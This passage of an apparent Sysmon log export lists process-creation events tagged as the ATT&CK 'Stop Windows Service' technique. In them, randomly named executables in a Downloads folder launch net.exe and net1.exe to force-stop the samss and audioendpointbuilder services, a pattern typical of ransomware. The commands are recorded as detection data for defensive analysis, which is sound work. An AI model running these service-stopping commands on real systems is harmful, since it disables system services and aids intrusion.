Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John 
Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:52.529"",""processGuid"":""{df9fc3d3-1b3c-5ec9-0000-00102c552a00}"",""processId"":""290920"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:41.517",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:40.170 +ProcessGuid: {df9fc3d3-1b30-5ec9-0000-001072cb2700} +ProcessId: 266028 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b2f-5ec9-0000-00103bb92700} +ParentProcessId: 265608 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:40.173863200Z"",""eventRecordID"":""1726"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:40.170\r\nProcessGuid: {df9fc3d3-1b30-5ec9-0000-001072cb2700}\r\nProcessId: 266028\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b2f-5ec9-0000-00103bb92700}\r\nParentProcessId: 265608\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 
12:46:40.170"",""processGuid"":""{df9fc3d3-1b30-5ec9-0000-001072cb2700}"",""processId"":""266028"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b2f-5ec9-0000-00103bb92700}"",""parentProcessId"":""265608"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:46:41.497",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:39.930 +ProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001082b92700} +ProcessId: 265616 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: 
{df9fc3d3-1b2f-5ec9-0000-001074ae2700} +ParentProcessId: 1660 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:39.989961900Z"",""eventRecordID"":""1725"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:39.930\r\nProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001082b92700}\r\nProcessId: 265616\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001074ae2700}\r\nParentProcessId: 1660\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 
12:46:39.930"",""processGuid"":""{df9fc3d3-1b2f-5ec9-0000-001082b92700}"",""processId"":""265616"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b2f-5ec9-0000-001074ae2700}"",""parentProcessId"":""1660"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:46:41.481",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:39.926 +ProcessGuid: {df9fc3d3-1b2f-5ec9-0000-00103bb92700} +ProcessId: 265608 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: 
{df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:39.944232200Z"",""eventRecordID"":""1724"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:39.926\r\nProcessGuid: {df9fc3d3-1b2f-5ec9-0000-00103bb92700}\r\nProcessId: 265608\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 
12:46:39.926"",""processGuid"":""{df9fc3d3-1b2f-5ec9-0000-00103bb92700}"",""processId"":""265608"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:46:41.466",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:39.736 +ProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001074ae2700} +ProcessId: 1660 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 
+ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:39.782687500Z"",""eventRecordID"":""1723"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:39.736\r\nProcessGuid: {df9fc3d3-1b2f-5ec9-0000-001074ae2700}\r\nProcessId: 1660\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 
12:46:39.736"",""processGuid"":""{df9fc3d3-1b2f-5ec9-0000-001074ae2700}"",""processId"":""1660"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:46:31.684",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:30.589 +ProcessGuid: {df9fc3d3-1b26-5ec9-0000-001019bb2500} +ProcessId: 247320 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: 
{df9fc3d3-1b26-5ec9-0000-0010a8a72500} +ParentProcessId: 246560 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:30.602147300Z"",""eventRecordID"":""1722"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:30.589\r\nProcessGuid: {df9fc3d3-1b26-5ec9-0000-001019bb2500}\r\nProcessId: 247320\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b26-5ec9-0000-0010a8a72500}\r\nParentProcessId: 246560\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:30.589"",""processGuid"":""{df9fc3d3-1b26-5ec9-0000-001019bb2500}"",""processId"":""247320"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 
(WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b26-5ec9-0000-0010a8a72500}"",""parentProcessId"":""246560"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:46:31.669",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:30.221 +ProcessGuid: {df9fc3d3-1b26-5ec9-0000-0010a8a72500} +ProcessId: 246560 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 
""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:30.247574300Z"",""eventRecordID"":""1721"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:30.221\r\nProcessGuid: {df9fc3d3-1b26-5ec9-0000-0010a8a72500}\r\nProcessId: 246560\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:30.221"",""processGuid"":""{df9fc3d3-1b26-5ec9-0000-0010a8a72500}"",""processId"":""246560"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:31.653",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:30.212 +ProcessGuid: {df9fc3d3-1b26-5ec9-0000-001026a72500} +ProcessId: 246552 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 